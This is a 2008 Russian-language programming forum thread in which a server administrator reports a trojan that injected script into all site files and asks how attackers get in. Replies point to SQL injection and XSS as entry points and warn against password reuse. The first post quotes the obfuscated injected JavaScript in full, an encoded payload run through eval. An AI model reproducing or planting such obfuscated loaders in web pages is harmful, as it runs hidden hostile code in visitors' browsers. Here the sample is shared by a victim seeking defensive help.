Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 18.08.2008, 09:23   #1
skylight
 
Регистрация: 18.08.2008
Сообщений: 3
Печаль Взлом сайтов и спам с целью организации DOS атаки

У нас свой частный сервак, на котором более 15 сайтов
у нас постоянная нагрузка на сервак из-за того что нас каждую неделю досили, а досили именно трекер,после этого мы решили трекер снять и поставить все сайты на ДЛЕ, дос атаки закончились( не знаю по каким причинам или просто программный дос их не берет, я не знаю)
Буквально вчера все сайты вырубились причиной неработоспособности оказалось был Trojan-Cliker.Html-Iframe.uv(касперский показал)
троян вписал скрипт во все html,tpl,js файлы
Сервак погряз в запросах кудато и откинулся на время(так я понял очередная дос атака сработала )
Сайты восстановили еще тишина
Подскажите что делать как себя защитить ...?
Как злоумышленники проникают на фтп?
(раньше такое тоже было как то но спаммили индексы Виагрой)

ниже код что используется в спаме страниц
PHP код:
<script>vvxxx="2972292029732871292229712921287274212828287429262872297174277428732329262929287429752922297174762873287429737322712374742927287228722876732574207420287329712975287429732927297528722928297529222971742129732920292274202973292829267422297429262921742029232971292174212973292829267320287128732971287473747123747474762929287429752922297129742920287429722971287473227123747473767123747474762927297129262928292728727322712374747376712374747476292229752874292829262921292729712926292829272872732271237474737671237474747629222975287429282926292128282926297228722927732271237474737671237474747628732973287429202923292329262921292873227123747429212920712374747476282829262972287229277322712374747376712374747476287328722826292329717322712374742972292628732876292329752826732574762921292029212971712374747321732374202926292928742975292229717321742874267324282928272829282928297322747472212975722174747324";vxvvv="";vvxv="function vvxx() {vvvxv=eval;vvvx=unescape;vxvxx=String.fromCharCode;vxxxx=Math.PI;vvxvv=parseInt;vvvvx=vvxvv(~((vxxxx&vxxxx)|(~vxxxx&vxxxx)&(vxxxx&~vxxxx)|(~vxxxx&~vxxxx)));vxvx=vvxvv(((vvvvx&vvvvx)|(~vvvvx&vvvvx)&(vvvvx&~vvvvx)|(~vvvvx&~vvvvx))&1);vvvxx=vxvx<<vxvx;vvvvv=vvvvx;for(vxxvv=vvvvx;vxxvv<vvxv.length;vxxvv-=-vxvx) vvvvv+=vvxvv(vvxv.charCodeAt(vxxvv));vvvvv.toString();vvvvv%=vvvx(0x64);for(vvxvx=vvvvx;vvxvx<(vvxxx.length>>vvvxx);vvxvx-=-vxvx) {vvxxv='';vxxx='';for(vxvv=vvvvx;vxvv<(vxvx<<vvvxx);vxvv-=-vxvx) if(vxvv<vvvxx) vvxxv+=vvxxx.charAt(vvxvx*(vvvxx<<vxvx)+vxvv);else vxxx+=vvxxx.charAt(vvxvx*(vxvx<<vvvxx)+vxvv);vxvvv+=vxvxx(vvvx(0xFF)-vvxvv(vvvx('%'+(((vvxvv(vvxxv,(vvvxx<<vxvx)<<vvvxx)^vvvvv)<15.5)?vvvvx.toString():'')+Math.round(vvxvv(vvxxv,(vvvxx<<vxvx)<<vvvxx)^vvvvv).toString((vvvxx<<vxvx)<<vvvxx))+vvvx('%'+(((vvvvv^vvxvv(vxxx,vvvxx<<(vxvx+vvvxx)))<15.5)?vvvvx.toString():'')+Math.round(vvxvv(vxxx,vvvxx<<(vxvx+vvvxx))^vvvvv).toString(vvvxx<<(vxvx+vvvxx))),vvvxx<<(vvvxx+vxvx)));}try {vvvxv(vxvvv);} catch(e) {try{eval(vxvvv);} catch(e) {vxvvx=vxvx;}try {if(vxvvx) {window.location='/';}} catch(e) {}}}vvxx();";eval(vvxv);</script> 
skylight вне форума Ответить с цитированием
Старый 18.08.2008, 12:52   #2
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,792
По умолчанию

Цитата:
Как злоумышленники проникают на фтп?
Пробивают пароль через XSS атаки или SQLиньекциями и если пароли к БД подходят к ФТП то пользуются ими.

Имхо, хотьшб защититься - пиши грамотно софты свои и пароли одни и те же на используй.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 22.08.2008, 11:42   #3
cyberguru
Пользователь
 
Регистрация: 21.08.2008
Сообщений: 27
По умолчанию

пароли никогда не ставь одинаковые и простые тоже никогда не ставь !
потому что это легко бьется через sql иньекции.! тупой брутфорс !
а что за софт на сервачке стоит ? тоетсь какие бд, операционка ну и все остальное ?
cyberguru вне форума Ответить с цитированием
Старый 27.08.2008, 05:11   #4
KORN
Банхаммер
Участник клуба
 
Аватар для KORN
 
Регистрация: 17.02.2007
Сообщений: 1,754
По умолчанию

необязательно что юзается FTP, если сайты на движках то могли и через SQLinj проникнуть на сайт, почитай хакера там грамотно все описано и показано...

проверь логи входа админов на сайт, и то что меняли, заливали... ставьте фаерволы которые будут ддос отфильтровывать...

в общем затыкай дыры на сайтах, меняй пароли, ставь софт...
Перед тем как спросить ищи на форуме и в GOOGLE
KORN вне форума Ответить с цитированием
Старый 05.09.2008, 20:11   #5
=BLooD=
Новичок
Джуниор
 
Регистрация: 05.09.2008
Сообщений: 2
По умолчанию

Плиз подскажите у меня на каждой странице с низу вылазиет чутьли не в четверть страницы какаято вкладка порнушная (плагин бесплатного доступа на сайт ****** на етой вкадке еще с права написанно для удоления етого плагина отправьте смс тудато тудато с текстом такимто и вам придет код позволяющий удолить етот плагин и дающий доступ к сайту.Подскажите как убрать ету фигню и почему она у меня вылезла? прошу вас

Последний раз редактировалось zetrix; 06.09.2008 в 10:08.
=BLooD= вне форума Ответить с цитированием
Старый 05.09.2008, 20:16   #6
DM_bite
Участник клуба
 
Аватар для DM_bite
 
Регистрация: 29.07.2008
Сообщений: 1,091
По умолчанию

Я избавился так:Инструменты-->>>Дополнения(и там ищешь плагин - название не помню)
ЗЫ:У меня лис стоит, но думаю IE,Opera - аналогично.
Кто бы ты ни был - не думай о себе слишком (с)
DM_bite вне форума Ответить с цитированием
Старый 06.09.2008, 01:30   #7
=BLooD=
Новичок
Джуниор
 
Регистрация: 05.09.2008
Сообщений: 2
По умолчанию

Цитата:
Сообщение от DM_bite Посмотреть сообщение
Я избавился так:Инструменты-->>>Дополнения(и там ищешь плагин - название не помню)
ЗЫ:У меня лис стоит, но думаю IE,Opera - аналогично.
Так подскажи че с етими плагинами делать их не удолить не заменить нельзя.
=BLooD= вне форума Ответить с цитированием
Старый 06.09.2008, 11:34   #8
DM_bite
Участник клуба
 
Аватар для DM_bite
 
Регистрация: 29.07.2008
Сообщений: 1,091
По умолчанию

Цитата:
Так подскажи че с етими плагинами делать их не удолить не заменить нельзя.
Во-первых:какой у тебя браузер?
Во-вторых:Можно удалить любой плагин и дополнение поставленное на браузер(методы у различных обозревателей разные)..Ну и в-третьих гуглить не пробовал на эту тему?Наверняка узнаешь много нового....
Кто бы ты ни был - не думай о себе слишком (с)
DM_bite вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Junior Java Developer. Пишу бесплатно с целью самообучения. kulikoff Фриланс 3 04.09.2008 20:59
Атаки на сервера Pblog Обсуждение статей 0 27.05.2007 02:13
Спам в личке Fainder О форуме и сайтах клуба 2 23.05.2007 14:15
сетевые атаки Lolita Работа с сетью в Delphi 0 02.12.2006 15:18